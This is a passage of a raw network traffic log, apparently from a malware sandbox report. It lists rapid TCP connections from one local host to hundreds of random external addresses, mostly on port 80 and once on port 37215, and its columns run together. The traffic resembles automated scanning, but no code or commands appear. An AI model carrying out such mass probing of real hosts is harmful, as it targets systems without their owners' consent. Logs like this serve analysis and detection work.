                                          Nov 7, 2024 11:57:58.412313938 CET3044880192.168.2.1337.15.47.35
                                          Nov 7, 2024 11:57:58.412318945 CET802544112.154.172.39192.168.2.13
                                          Nov 7, 2024 11:57:58.412323952 CET254480192.168.2.13112.154.225.60
                                          Nov 7, 2024 11:57:58.412333012 CET3044880192.168.2.1337.250.168.173
                                          Nov 7, 2024 11:57:58.412333012 CET3044880192.168.2.1337.159.244.221
                                          Nov 7, 2024 11:57:58.412333965 CET802544112.34.4.229192.168.2.13
                                          Nov 7, 2024 11:57:58.412347078 CET254480192.168.2.13112.84.132.148
                                          Nov 7, 2024 11:57:58.412347078 CET802544112.125.96.232192.168.2.13
                                          Nov 7, 2024 11:57:58.412354946 CET254480192.168.2.13112.154.172.39
                                          Nov 7, 2024 11:57:58.412360907 CET254480192.168.2.13112.34.4.229
                                          Nov 7, 2024 11:57:58.412362099 CET3044880192.168.2.1337.134.78.164
                                          Nov 7, 2024 11:57:58.412362099 CET3044880192.168.2.1337.39.130.253
                                          Nov 7, 2024 11:57:58.412369013 CET802544112.155.21.197192.168.2.13
                                          Nov 7, 2024 11:57:58.412379980 CET254480192.168.2.13112.125.96.232
                                          Nov 7, 2024 11:57:58.412381887 CET802544112.124.137.79192.168.2.13
                                          Nov 7, 2024 11:57:58.412394047 CET802544112.99.52.241192.168.2.13
                                          Nov 7, 2024 11:57:58.412398100 CET254480192.168.2.13112.155.21.197
                                          Nov 7, 2024 11:57:58.412411928 CET254480192.168.2.13112.124.137.79
                                          Nov 7, 2024 11:57:58.412416935 CET802544112.196.108.49192.168.2.13
                                          Nov 7, 2024 11:57:58.412421942 CET3044880192.168.2.1337.144.240.22
                                          Nov 7, 2024 11:57:58.412429094 CET802544112.108.119.179192.168.2.13
                                          Nov 7, 2024 11:57:58.412434101 CET254480192.168.2.13112.99.52.241
                                          Nov 7, 2024 11:57:58.412435055 CET3044880192.168.2.1337.102.204.178
                                          Nov 7, 2024 11:57:58.412442923 CET3044880192.168.2.1337.48.81.250
                                          Nov 7, 2024 11:57:58.412452936 CET802544112.236.40.216192.168.2.13
                                          Nov 7, 2024 11:57:58.412456989 CET254480192.168.2.13112.196.108.49
                                          Nov 7, 2024 11:57:58.412466049 CET802544112.143.26.69192.168.2.13
                                          Nov 7, 2024 11:57:58.412470102 CET3044880192.168.2.1337.83.200.225
                                          Nov 7, 2024 11:57:58.412471056 CET254480192.168.2.13112.108.119.179
                                          Nov 7, 2024 11:57:58.412487984 CET802544112.5.181.241192.168.2.13
                                          Nov 7, 2024 11:57:58.412491083 CET254480192.168.2.13112.236.40.216
                                          Nov 7, 2024 11:57:58.412492990 CET254480192.168.2.13112.143.26.69
                                          Nov 7, 2024 11:57:58.412501097 CET802544112.140.79.28192.168.2.13
                                          Nov 7, 2024 11:57:58.412514925 CET802544112.133.115.15192.168.2.13
                                          Nov 7, 2024 11:57:58.412527084 CET802544112.47.244.103192.168.2.13
                                          Nov 7, 2024 11:57:58.412528992 CET254480192.168.2.13112.5.181.241
                                          Nov 7, 2024 11:57:58.412529945 CET3044880192.168.2.1337.23.217.106
                                          Nov 7, 2024 11:57:58.412534952 CET802544112.189.111.26192.168.2.13
                                          Nov 7, 2024 11:57:58.412538052 CET254480192.168.2.13112.140.79.28
                                          Nov 7, 2024 11:57:58.412539005 CET3044880192.168.2.1337.123.82.206
                                          Nov 7, 2024 11:57:58.412545919 CET3044880192.168.2.1337.8.133.228
                                          Nov 7, 2024 11:57:58.412547112 CET802544112.69.229.252192.168.2.13
                                          Nov 7, 2024 11:57:58.412559032 CET254480192.168.2.13112.47.244.103
                                          Nov 7, 2024 11:57:58.412559986 CET802544112.165.246.153192.168.2.13
                                          Nov 7, 2024 11:57:58.412568092 CET254480192.168.2.13112.133.115.15
                                          Nov 7, 2024 11:57:58.412573099 CET802544112.231.64.120192.168.2.13
                                          Nov 7, 2024 11:57:58.412576914 CET254480192.168.2.13112.189.111.26
                                          Nov 7, 2024 11:57:58.412576914 CET3044880192.168.2.1337.182.211.142
                                          Nov 7, 2024 11:57:58.412579060 CET254480192.168.2.13112.69.229.252
                                          Nov 7, 2024 11:57:58.412590027 CET802544112.53.66.17192.168.2.13
                                          Nov 7, 2024 11:57:58.412591934 CET254480192.168.2.13112.165.246.153
                                          Nov 7, 2024 11:57:58.412609100 CET3044880192.168.2.1337.43.212.127
                                          Nov 7, 2024 11:57:58.412609100 CET3044880192.168.2.1337.138.50.246
                                          Nov 7, 2024 11:57:58.412611961 CET254480192.168.2.13112.231.64.120
                                          Nov 7, 2024 11:57:58.412626028 CET3044880192.168.2.1337.0.162.100
                                          Nov 7, 2024 11:57:58.412626028 CET254480192.168.2.13112.53.66.17
                                          Nov 7, 2024 11:57:58.412637949 CET3044880192.168.2.1337.16.207.254
                                          Nov 7, 2024 11:57:58.412646055 CET3044880192.168.2.1337.253.149.150
                                          Nov 7, 2024 11:57:58.412662983 CET3044880192.168.2.1337.79.104.230
                                          Nov 7, 2024 11:57:58.412662983 CET3044880192.168.2.1337.147.141.62
                                          Nov 7, 2024 11:57:58.412697077 CET3044880192.168.2.1337.174.16.224
                                          Nov 7, 2024 11:57:58.412724972 CET3044880192.168.2.1337.98.137.220
                                          Nov 7, 2024 11:57:58.412744999 CET3044880192.168.2.1337.200.5.249
                                          Nov 7, 2024 11:57:58.412755966 CET3044880192.168.2.1337.255.86.133
                                          Nov 7, 2024 11:57:58.412765026 CET3044880192.168.2.1337.177.49.210
                                          Nov 7, 2024 11:57:58.412769079 CET3044880192.168.2.1337.192.214.47
                                          Nov 7, 2024 11:57:58.412781954 CET3044880192.168.2.1337.191.114.177
                                          Nov 7, 2024 11:57:58.412795067 CET3044880192.168.2.1337.13.31.236
                                          Nov 7, 2024 11:57:58.412812948 CET3044880192.168.2.1337.195.111.33
                                          Nov 7, 2024 11:57:58.412822008 CET3044880192.168.2.1337.11.194.166
                                          Nov 7, 2024 11:57:58.412822962 CET3044880192.168.2.1337.23.81.229
                                          Nov 7, 2024 11:57:58.412827969 CET3044880192.168.2.1337.69.108.126
                                          Nov 7, 2024 11:57:58.412838936 CET3044880192.168.2.1337.106.34.153
                                          Nov 7, 2024 11:57:58.412863970 CET3044880192.168.2.1337.66.207.146
                                          Nov 7, 2024 11:57:58.412869930 CET3044880192.168.2.1337.243.163.196
                                          Nov 7, 2024 11:57:58.412897110 CET802544112.122.28.145192.168.2.13
                                          Nov 7, 2024 11:57:58.412909031 CET3044880192.168.2.1337.151.186.54
                                          Nov 7, 2024 11:57:58.412913084 CET3044880192.168.2.1337.32.200.199
                                          Nov 7, 2024 11:57:58.412916899 CET3044880192.168.2.1337.228.210.22
                                          Nov 7, 2024 11:57:58.412919998 CET802544112.54.8.168192.168.2.13
                                          Nov 7, 2024 11:57:58.412919998 CET3044880192.168.2.1337.216.146.18
                                          Nov 7, 2024 11:57:58.412919998 CET3044880192.168.2.1337.118.95.123
                                          Nov 7, 2024 11:57:58.412921906 CET3044880192.168.2.1337.191.13.220
                                          Nov 7, 2024 11:57:58.412929058 CET254480192.168.2.13112.122.28.145
                                          Nov 7, 2024 11:57:58.412931919 CET802544112.0.120.162192.168.2.13
                                          Nov 7, 2024 11:57:58.412946939 CET802544112.94.208.38192.168.2.13
                                          Nov 7, 2024 11:57:58.412950993 CET254480192.168.2.13112.54.8.168
                                          Nov 7, 2024 11:57:58.412959099 CET802544112.114.61.114192.168.2.13
                                          Nov 7, 2024 11:57:58.412975073 CET802544112.0.227.222192.168.2.13
                                          Nov 7, 2024 11:57:58.412981033 CET3044880192.168.2.1337.201.239.198
                                          Nov 7, 2024 11:57:58.412986994 CET254480192.168.2.13112.0.120.162
                                          Nov 7, 2024 11:57:58.412991047 CET802544112.216.125.130192.168.2.13
                                          Nov 7, 2024 11:57:58.412990093 CET254480192.168.2.13112.94.208.38
                                          Nov 7, 2024 11:57:58.412990093 CET254480192.168.2.13112.114.61.114
                                          Nov 7, 2024 11:57:58.413006067 CET802544112.50.182.10192.168.2.13
                                          Nov 7, 2024 11:57:58.413007975 CET3044880192.168.2.1337.30.203.30
                                          Nov 7, 2024 11:57:58.413008928 CET3044880192.168.2.1337.2.209.42
                                          Nov 7, 2024 11:57:58.413019896 CET254480192.168.2.13112.0.227.222
                                          Nov 7, 2024 11:57:58.413023949 CET254480192.168.2.13112.216.125.130
                                          Nov 7, 2024 11:57:58.413028002 CET802544112.242.29.47192.168.2.13
                                          Nov 7, 2024 11:57:58.413028955 CET3044880192.168.2.1337.177.124.129
                                          Nov 7, 2024 11:57:58.413041115 CET254480192.168.2.13112.50.182.10
                                          Nov 7, 2024 11:57:58.413041115 CET802544112.206.195.144192.168.2.13
                                          Nov 7, 2024 11:57:58.413049936 CET3044880192.168.2.1337.179.68.219
                                          Nov 7, 2024 11:57:58.413054943 CET802544112.182.30.41192.168.2.13
                                          Nov 7, 2024 11:57:58.413063049 CET254480192.168.2.13112.242.29.47
                                          Nov 7, 2024 11:57:58.413069010 CET802544112.117.5.208192.168.2.13
                                          Nov 7, 2024 11:57:58.413080931 CET802544112.215.225.195192.168.2.13
                                          Nov 7, 2024 11:57:58.413081884 CET254480192.168.2.13112.206.195.144
                                          Nov 7, 2024 11:57:58.413089037 CET254480192.168.2.13112.182.30.41
                                          Nov 7, 2024 11:57:58.413094997 CET802544112.6.106.197192.168.2.13
                                          Nov 7, 2024 11:57:58.413108110 CET254480192.168.2.13112.215.225.195
                                          Nov 7, 2024 11:57:58.413109064 CET802544112.213.218.74192.168.2.13
                                          Nov 7, 2024 11:57:58.413113117 CET254480192.168.2.13112.117.5.208
                                          Nov 7, 2024 11:57:58.413113117 CET3044880192.168.2.1337.209.249.80
                                          Nov 7, 2024 11:57:58.413124084 CET802544112.41.212.34192.168.2.13
                                          Nov 7, 2024 11:57:58.413131952 CET254480192.168.2.13112.6.106.197
                                          Nov 7, 2024 11:57:58.413136005 CET802544112.5.130.210192.168.2.13
                                          Nov 7, 2024 11:57:58.413146019 CET254480192.168.2.13112.213.218.74
                                          Nov 7, 2024 11:57:58.413150072 CET802544112.135.216.166192.168.2.13
                                          Nov 7, 2024 11:57:58.413156986 CET254480192.168.2.13112.41.212.34
                                          Nov 7, 2024 11:57:58.413163900 CET802544112.206.33.156192.168.2.13
                                          Nov 7, 2024 11:57:58.413172007 CET254480192.168.2.13112.5.130.210
                                          Nov 7, 2024 11:57:58.413177967 CET802544112.116.204.241192.168.2.13
                                          Nov 7, 2024 11:57:58.413178921 CET254480192.168.2.13112.135.216.166
                                          Nov 7, 2024 11:57:58.413191080 CET372153070441.219.6.207192.168.2.13
                                          Nov 7, 2024 11:57:58.413192987 CET254480192.168.2.13112.206.33.156
                                          Nov 7, 2024 11:57:58.413211107 CET254480192.168.2.13112.116.204.241
                                          Nov 7, 2024 11:57:58.413216114 CET3044880192.168.2.1337.47.71.228
                                          Nov 7, 2024 11:57:58.413222075 CET3070437215192.168.2.1341.219.6.207
                                          Nov 7, 2024 11:57:58.413227081 CET3044880192.168.2.1337.41.168.33
                                          Nov 7, 2024 11:57:58.413250923 CET3044880192.168.2.1337.241.0.195
                                          Nov 7, 2024 11:57:58.413250923 CET3044880192.168.2.1337.211.181.59
                                          Nov 7, 2024 11:57:58.413254023 CET3044880192.168.2.1337.21.5.199
                                          Nov 7, 2024 11:57:58.413269997 CET3044880192.168.2.1337.51.177.177
                                          Nov 7, 2024 11:57:58.413280964 CET3044880192.168.2.1337.4.22.17
                                          Nov 7, 2024 11:57:58.413322926 CET3044880192.168.2.1337.29.110.87
                                          Nov 7, 2024 11:57:58.413378000 CET3044880192.168.2.1337.0.232.152
                                          Nov 7, 2024 11:57:58.413402081 CET3044880192.168.2.1337.205.181.100
                                          Nov 7, 2024 11:57:58.413403034 CET3044880192.168.2.1337.160.215.101
                                          Nov 7, 2024 11:57:58.413409948 CET3044880192.168.2.1337.45.17.28
                                          Nov 7, 2024 11:57:58.413408995 CET3044880192.168.2.1337.88.55.58
                                          Nov 7, 2024 11:57:58.413419008 CET3044880192.168.2.1337.115.156.128
                                          Nov 7, 2024 11:57:58.413425922 CET3044880192.168.2.1337.153.222.18
                                          Nov 7, 2024 11:57:58.413460016 CET3044880192.168.2.1337.49.152.157
                                          Nov 7, 2024 11:57:58.413470030 CET3044880192.168.2.1337.0.113.254
                                          Nov 7, 2024 11:57:58.413506031 CET3044880192.168.2.1337.132.111.14
                                          Nov 7, 2024 11:57:58.413518906 CET3044880192.168.2.1337.185.149.65
                                          Nov 7, 2024 11:57:58.413532972 CET3044880192.168.2.1337.69.111.22
                                          Nov 7, 2024 11:57:58.413536072 CET3044880192.168.2.1337.121.138.39
                                          Nov 7, 2024 11:57:58.413543940 CET3044880192.168.2.1337.232.83.134
                                          Nov 7, 2024 11:57:58.413575888 CET3044880192.168.2.1337.186.175.231
                                          Nov 7, 2024 11:57:58.413583040 CET3044880192.168.2.1337.17.200.225
                                          Nov 7, 2024 11:57:58.413633108 CET3044880192.168.2.1337.78.80.109
                                          Nov 7, 2024 11:57:58.413642883 CET3044880192.168.2.1337.82.124.206
                                          Nov 7, 2024 11:57:58.413651943 CET3044880192.168.2.1337.181.178.95
                                          Nov 7, 2024 11:57:58.413654089 CET3044880192.168.2.1337.51.179.10
                                          Nov 7, 2024 11:57:58.413692951 CET3044880192.168.2.1337.214.133.15
                                          Nov 7, 2024 11:57:58.413702965 CET3044880192.168.2.1337.178.156.137
                                          Nov 7, 2024 11:57:58.413711071 CET3044880192.168.2.1337.254.36.150
                                          Nov 7, 2024 11:57:58.413727999 CET3044880192.168.2.1337.131.126.65
                                          Nov 7, 2024 11:57:58.413728952 CET3044880192.168.2.1337.117.197.255
                                          Nov 7, 2024 11:57:58.413763046 CET3044880192.168.2.1337.58.145.28
                                          Nov 7, 2024 11:57:58.413780928 CET3044880192.168.2.1337.12.229.151
                                          Nov 7, 2024 11:57:58.413780928 CET3044880192.168.2.1337.23.11.178
                                          Nov 7, 2024 11:57:58.413784981 CET3044880192.168.2.1337.194.183.182
                                          Nov 7, 2024 11:57:58.413816929 CET3044880192.168.2.1337.97.14.166
                                          Nov 7, 2024 11:57:58.413836002 CET3044880192.168.2.1337.187.204.132
                                          Nov 7, 2024 11:57:58.413839102 CET3044880192.168.2.1337.7.12.245
                                          Nov 7, 2024 11:57:58.413852930 CET3044880192.168.2.1337.62.114.164
                                          Nov 7, 2024 11:57:58.413860083 CET3044880192.168.2.1337.74.180.254
                                          Nov 7, 2024 11:57:58.413886070 CET3044880192.168.2.1337.118.181.179
                                          Nov 7, 2024 11:57:58.413912058 CET3044880192.168.2.1337.11.123.14
                                          Nov 7, 2024 11:57:58.413914919 CET3044880192.168.2.1337.145.227.130
                                          Nov 7, 2024 11:57:58.413918972 CET3044880192.168.2.1337.31.162.48
                                          Nov 7, 2024 11:57:58.413935900 CET3044880192.168.2.1337.125.33.131
                                          Nov 7, 2024 11:57:58.413940907 CET3044880192.168.2.1337.24.13.253
                                          Nov 7, 2024 11:57:58.413940907 CET3044880192.168.2.1337.178.18.173
                                          Nov 7, 2024 11:57:58.413959980 CET3044880192.168.2.1337.174.81.76
                                          Nov 7, 2024 11:57:58.413988113 CET3044880192.168.2.1337.37.138.11
                                          Nov 7, 2024 11:57:58.414017916 CET3044880192.168.2.1337.143.203.130
                                          Nov 7, 2024 11:57:58.414021015 CET3044880192.168.2.1337.23.93.7
                                          Nov 7, 2024 11:57:58.414026976 CET3044880192.168.2.1337.79.169.158
                                          Nov 7, 2024 11:57:58.414038897 CET3044880192.168.2.1337.231.12.83
                                          Nov 7, 2024 11:57:58.414038897 CET3044880192.168.2.1337.181.4.220
                                          Nov 7, 2024 11:57:58.414081097 CET3044880192.168.2.1337.11.38.75
                                          Nov 7, 2024 11:57:58.414089918 CET3044880192.168.2.1337.169.154.240
                                          Nov 7, 2024 11:57:58.414089918 CET3044880192.168.2.1337.96.91.215
                                          Nov 7, 2024 11:57:58.414089918 CET3044880192.168.2.1337.131.96.157
                                          Nov 7, 2024 11:57:58.414118052 CET3044880192.168.2.1337.235.102.36
                                          Nov 7, 2024 11:57:58.414123058 CET3044880192.168.2.1337.235.61.119
                                          Nov 7, 2024 11:57:58.414130926 CET3044880192.168.2.1337.66.108.213
                                          Nov 7, 2024 11:57:58.414166927 CET3044880192.168.2.1337.178.41.71
                                          Nov 7, 2024 11:57:58.414175034 CET3044880192.168.2.1337.6.144.6
                                          Nov 7, 2024 11:57:58.414180994 CET3044880192.168.2.1337.68.49.119
                                          Nov 7, 2024 11:57:58.414189100 CET3044880192.168.2.1337.136.215.176
                                          Nov 7, 2024 11:57:58.414200068 CET3044880192.168.2.1337.5.22.37
                                          Nov 7, 2024 11:57:58.414242029 CET3044880192.168.2.1337.73.132.27
                                          Nov 7, 2024 11:57:58.414242983 CET3044880192.168.2.1337.98.5.166
                                          Nov 7, 2024 11:57:58.414253950 CET3044880192.168.2.1337.119.157.229
                                          Nov 7, 2024 11:57:58.414261103 CET3044880192.168.2.1337.153.172.14
                                          Nov 7, 2024 11:57:58.414272070 CET3044880192.168.2.1337.144.233.96
                                          Nov 7, 2024 11:57:58.414287090 CET3044880192.168.2.1337.241.84.240
                                          Nov 7, 2024 11:57:58.414324045 CET3044880192.168.2.1337.50.51.139
                                          Nov 7, 2024 11:57:58.414334059 CET3044880192.168.2.1337.9.81.168
                                          Nov 7, 2024 11:57:58.414340973 CET3044880192.168.2.1337.47.22.132
                                          Nov 7, 2024 11:57:58.414376974 CET3044880192.168.2.1337.22.39.132
                                          Nov 7, 2024 11:57:58.414387941 CET3044880192.168.2.1337.245.135.124
                                          Nov 7, 2024 11:57:58.414402008 CET3044880192.168.2.1337.236.186.33
                                          Nov 7, 2024 11:57:58.414411068 CET3044880192.168.2.1337.245.183.203
                                          Nov 7, 2024 11:57:58.414447069 CET3044880192.168.2.1337.68.50.192
                                          Nov 7, 2024 11:57:58.414450884 CET3044880192.168.2.1337.0.78.204
                                          Nov 7, 2024 11:57:58.414462090 CET3044880192.168.2.1337.174.93.226
                                          Nov 7, 2024 11:57:58.414467096 CET3044880192.168.2.1337.94.231.120
                                          Nov 7, 2024 11:57:58.414479971 CET3044880192.168.2.1337.77.213.112
                                          Nov 7, 2024 11:57:58.414491892 CET3044880192.168.2.1337.116.157.16
                                          Nov 7, 2024 11:57:58.414540052 CET3044880192.168.2.1337.50.70.25
                                          Nov 7, 2024 11:57:58.414546967 CET3044880192.168.2.1337.11.163.252
                                          Nov 7, 2024 11:57:58.414555073 CET3044880192.168.2.1337.142.96.3
                                          Nov 7, 2024 11:57:58.414557934 CET3044880192.168.2.1337.181.99.247
                                          Nov 7, 2024 11:57:58.414602041 CET3044880192.168.2.1337.162.200.57
                                          Nov 7, 2024 11:57:58.414612055 CET3044880192.168.2.1337.234.223.42
                                          Nov 7, 2024 11:57:58.414618969 CET3044880192.168.2.1337.7.121.136
                                          Nov 7, 2024 11:57:58.414655924 CET3044880192.168.2.1337.56.76.114
                                          Nov 7, 2024 11:57:58.414679050 CET3044880192.168.2.1337.19.150.44
                                          Nov 7, 2024 11:57:58.414683104 CET3044880192.168.2.1337.251.130.35
                                          Nov 7, 2024 11:57:58.414686918 CET3044880192.168.2.1337.88.85.110
                                          Nov 7, 2024 11:57:58.414746046 CET228880192.168.2.13206.48.208.178
                                          Nov 7, 2024 11:57:58.414747000 CET228880192.168.2.13206.161.86.80
                                          Nov 7, 2024 11:57:58.414769888 CET228880192.168.2.13206.8.36.223
                                          Nov 7, 2024 11:57:58.414794922 CET228880192.168.2.13206.40.228.164
                                          Nov 7, 2024 11:57:58.414805889 CET3044880192.168.2.1337.9.53.174
                                          Nov 7, 2024 11:57:58.414817095 CET3044880192.168.2.1337.247.177.150
                                          Nov 7, 2024 11:57:58.414829016 CET3044880192.168.2.1337.31.139.254
                                          Nov 7, 2024 11:57:58.414836884 CET3044880192.168.2.1337.107.150.102
                                          Nov 7, 2024 11:57:58.414849997 CET3044880192.168.2.1337.172.104.131
                                          Nov 7, 2024 11:57:58.414885998 CET228880192.168.2.13206.176.255.235
                                          Nov 7, 2024 11:57:58.414887905 CET228880192.168.2.13206.131.57.238
                                          Nov 7, 2024 11:57:58.414901972 CET228880192.168.2.13206.113.157.68
                                          Nov 7, 2024 11:57:58.414920092 CET228880192.168.2.13206.207.86.121
                                          Nov 7, 2024 11:57:58.414920092 CET228880192.168.2.13206.177.88.117
                                          Nov 7, 2024 11:57:58.414927959 CET228880192.168.2.13206.135.59.8
                                          Nov 7, 2024 11:57:58.414968967 CET3044880192.168.2.1337.63.117.247
                                          Nov 7, 2024 11:57:58.414968967 CET3044880192.168.2.1337.132.77.227
                                          Nov 7, 2024 11:57:58.414984941 CET3044880192.168.2.1337.7.100.110
                                          Nov 7, 2024 11:57:58.414994001 CET3044880192.168.2.1337.149.170.73
                                          Nov 7, 2024 11:57:58.415030956 CET228880192.168.2.13206.135.172.138
                                          Nov 7, 2024 11:57:58.415041924 CET228880192.168.2.13206.167.61.54
                                          Nov 7, 2024 11:57:58.415045023 CET228880192.168.2.13206.219.120.80
                                          Nov 7, 2024 11:57:58.415061951 CET228880192.168.2.13206.3.91.142
                                          Nov 7, 2024 11:57:58.415102959 CET3044880192.168.2.1337.14.155.142
                                          Nov 7, 2024 11:57:58.415108919 CET3044880192.168.2.1337.215.171.46
                                          Nov 7, 2024 11:57:58.415119886 CET228880192.168.2.13206.193.4.127
                                          Nov 7, 2024 11:57:58.415121078 CET3044880192.168.2.1337.61.189.240
                                          Nov 7, 2024 11:57:58.415131092 CET3044880192.168.2.1337.23.76.48
                                          Nov 7, 2024 11:57:58.415132999 CET3044880192.168.2.1337.172.134.148
                                          Nov 7, 2024 11:57:58.415174007 CET228880192.168.2.13206.69.253.135
                                          Nov 7, 2024 11:57:58.415180922 CET228880192.168.2.13206.253.13.144
                                          Nov 7, 2024 11:57:58.415195942 CET228880192.168.2.13206.103.81.182
                                          Nov 7, 2024 11:57:58.415205956 CET228880192.168.2.13206.231.254.65
                                          Nov 7, 2024 11:57:58.415221930 CET228880192.168.2.13206.78.54.249
                                          Nov 7, 2024 11:57:58.415252924 CET3044880192.168.2.1337.252.237.244
                                          Nov 7, 2024 11:57:58.415252924 CET3044880192.168.2.1337.40.215.152
                                          Nov 7, 2024 11:57:58.415266991 CET3044880192.168.2.1337.46.248.235
                                          Nov 7, 2024 11:57:58.415270090 CET3044880192.168.2.1337.170.141.71
                                          Nov 7, 2024 11:57:58.415285110 CET3044880192.168.2.1337.179.72.108
                                          Nov 7, 2024 11:57:58.415292978 CET3044880192.168.2.1337.186.91.216
                                          Nov 7, 2024 11:57:58.415296078 CET3044880192.168.2.1337.171.26.249
                                          Nov 7, 2024 11:57:58.415344000 CET228880192.168.2.13206.4.186.235
                                          Nov 7, 2024 11:57:58.415348053 CET228880192.168.2.13206.94.145.85
                                          Nov 7, 2024 11:57:58.415354967 CET228880192.168.2.13206.12.63.80
                                          Nov 7, 2024 11:57:58.415363073 CET228880192.168.2.13206.140.68.73
                                          Nov 7, 2024 11:57:58.415374041 CET228880192.168.2.13206.135.183.77
                                          Nov 7, 2024 11:57:58.415383101 CET228880192.168.2.13206.55.167.67
                                          Nov 7, 2024 11:57:58.415399075 CET228880192.168.2.13206.243.201.84
                                          Nov 7, 2024 11:57:58.415399075 CET228880192.168.2.13206.31.95.93
                                          Nov 7, 2024 11:57:58.415437937 CET3044880192.168.2.1337.141.229.187
                                          Nov 7, 2024 11:57:58.415440083 CET3044880192.168.2.1337.253.109.1
                                          Nov 7, 2024 11:57:58.415451050 CET3044880192.168.2.1337.181.22.242
                                          Nov 7, 2024 11:57:58.415455103 CET3044880192.168.2.1337.7.185.157
                                          Nov 7, 2024 11:57:58.415492058 CET3044880192.168.2.1337.199.124.173
                                          Nov 7, 2024 11:57:58.415503979 CET228880192.168.2.13206.113.94.80
                                          Nov 7, 2024 11:57:58.415514946 CET228880192.168.2.13206.69.7.9
                                          Nov 7, 2024 11:57:58.415524006 CET228880192.168.2.13206.67.128.140
                                          Nov 7, 2024 11:57:58.415535927 CET228880192.168.2.13206.92.193.237
                                          Nov 7, 2024 11:57:58.415566921 CET3044880192.168.2.1337.60.47.206
                                          Nov 7, 2024 11:57:58.415581942 CET3044880192.168.2.1337.113.174.100
                                          Nov 7, 2024 11:57:58.415585995 CET3044880192.168.2.1337.104.96.174
                                          Nov 7, 2024 11:57:58.415596962 CET3044880192.168.2.1337.119.233.162
                                          Nov 7, 2024 11:57:58.415632963 CET228880192.168.2.13206.248.238.236
                                          Nov 7, 2024 11:57:58.415651083 CET228880192.168.2.13206.101.184.3
                                          Nov 7, 2024 11:57:58.415656090 CET228880192.168.2.13206.221.238.14
                                          Nov 7, 2024 11:57:58.415678024 CET228880192.168.2.13206.12.41.198
                                          Nov 7, 2024 11:57:58.415707111 CET3044880192.168.2.1337.146.225.220
                                          Nov 7, 2024 11:57:58.415707111 CET3044880192.168.2.1337.152.3.107
                                          Nov 7, 2024 11:57:58.415712118 CET3044880192.168.2.1337.119.123.144
                                          Nov 7, 2024 11:57:58.415744066 CET3044880192.168.2.1337.12.120.100
                                          Nov 7, 2024 11:57:58.415767908 CET3044880192.168.2.1337.111.154.148
                                          Nov 7, 2024 11:57:58.415775061 CET228880192.168.2.13206.157.134.235
                                          Nov 7, 2024 11:57:58.415781975 CET228880192.168.2.13206.247.22.101
                                          Nov 7, 2024 11:57:58.415797949 CET228880192.168.2.13206.43.1.53
                                          Nov 7, 2024 11:57:58.415801048 CET228880192.168.2.13206.250.49.176
                                          Nov 7, 2024 11:57:58.415802956 CET228880192.168.2.13206.189.38.219
                                          Nov 7, 2024 11:57:58.415854931 CET3044880192.168.2.1337.219.236.182
                                          Nov 7, 2024 11:57:58.415860891 CET3044880192.168.2.1337.56.230.179
                                          Nov 7, 2024 11:57:58.415862083 CET3044880192.168.2.1337.120.61.242
                                          Nov 7, 2024 11:57:58.415868998 CET3044880192.168.2.1337.92.183.168
                                          Nov 7, 2024 11:57:58.415910959 CET228880192.168.2.13206.233.7.202
                                          Nov 7, 2024 11:57:58.415924072 CET228880192.168.2.13206.129.3.207
                                          Nov 7, 2024 11:57:58.415935993 CET228880192.168.2.13206.108.248.19
                                          Nov 7, 2024 11:57:58.415940046 CET228880192.168.2.13206.121.201.207
                                          Nov 7, 2024 11:57:58.415982008 CET3044880192.168.2.1337.9.112.37
                                          Nov 7, 2024 11:57:58.415998936 CET3044880192.168.2.1337.178.229.255
                                          Nov 7, 2024 11:57:58.416004896 CET3044880192.168.2.1337.191.235.253
                                          Nov 7, 2024 11:57:58.416044950 CET3044880192.168.2.1337.42.163.235
                                          Nov 7, 2024 11:57:58.416049004 CET3044880192.168.2.1337.105.226.182
                                          Nov 7, 2024 11:57:58.416062117 CET3044880192.168.2.1337.128.237.67
                                          Nov 7, 2024 11:57:58.416074038 CET3044880192.168.2.1337.78.208.101
                                          Nov 7, 2024 11:57:58.416114092 CET228880192.168.2.13206.160.2.241
                                          Nov 7, 2024 11:57:58.416115046 CET228880192.168.2.13206.155.197.206
                                          Nov 7, 2024 11:57:58.416129112 CET228880192.168.2.13206.139.152.85
                                          Nov 7, 2024 11:57:58.416136980 CET228880192.168.2.13206.103.59.234
                                          Nov 7, 2024 11:57:58.416169882 CET228880192.168.2.13206.235.40.49
                                          Nov 7, 2024 11:57:58.416183949 CET228880192.168.2.13206.189.245.32
                                          Nov 7, 2024 11:57:58.416193008 CET228880192.168.2.13206.91.131.2
                                          Nov 7, 2024 11:57:58.416214943 CET228880192.168.2.13206.241.161.145
                                          Nov 7, 2024 11:57:58.416234970 CET3044880192.168.2.1337.96.149.163
                                          Nov 7, 2024 11:57:58.416248083 CET3044880192.168.2.1337.231.90.103
                                          Nov 7, 2024 11:57:58.416260004 CET3044880192.168.2.1337.251.196.79
                                          Nov 7, 2024 11:57:58.416271925 CET3044880192.168.2.1337.241.105.179
                                          Nov 7, 2024 11:57:58.416304111 CET228880192.168.2.13206.23.206.222
                                          Nov 7, 2024 11:57:58.416305065 CET228880192.168.2.13206.205.207.236
                                          Nov 7, 2024 11:57:58.416316032 CET228880192.168.2.13206.54.136.205
                                          Nov 7, 2024 11:57:58.416317940 CET228880192.168.2.13206.60.170.213
                                          Nov 7, 2024 11:57:58.416333914 CET228880192.168.2.13206.27.116.181
                                          Nov 7, 2024 11:57:58.416376114 CET3044880192.168.2.1337.215.37.115
                                          Nov 7, 2024 11:57:58.416392088 CET3044880192.168.2.1337.198.240.139
                                          Nov 7, 2024 11:57:58.416393995 CET3044880192.168.2.1337.25.63.121
                                          Nov 7, 2024 11:57:58.416400909 CET3044880192.168.2.1337.122.113.142
                                          Nov 7, 2024 11:57:58.416439056 CET3044880192.168.2.1337.252.145.219
                                          Nov 7, 2024 11:57:58.416440964 CET3044880192.168.2.1337.239.203.129
                                          Nov 7, 2024 11:57:58.416445971 CET3044880192.168.2.1337.134.195.131
                                          Nov 7, 2024 11:57:58.416464090 CET3044880192.168.2.1337.34.193.139
                                          Nov 7, 2024 11:57:58.416516066 CET228880192.168.2.13206.177.142.111
                                          Nov 7, 2024 11:57:58.416517019 CET228880192.168.2.13206.42.57.178
                                          Nov 7, 2024 11:57:58.416527033 CET228880192.168.2.13206.234.240.165
                                          Nov 7, 2024 11:57:58.416527033 CET228880192.168.2.13206.181.191.241
                                          Nov 7, 2024 11:57:58.416568995 CET228880192.168.2.13206.141.169.187
                                          Nov 7, 2024 11:57:58.416568995 CET3044880192.168.2.1337.96.98.40
                                          Nov 7, 2024 11:57:58.416589022 CET3044880192.168.2.1337.85.143.121
                                          Nov 7, 2024 11:57:58.416589975 CET3044880192.168.2.1337.103.4.131
                                          Nov 7, 2024 11:57:58.416596889 CET3044880192.168.2.1337.103.232.136
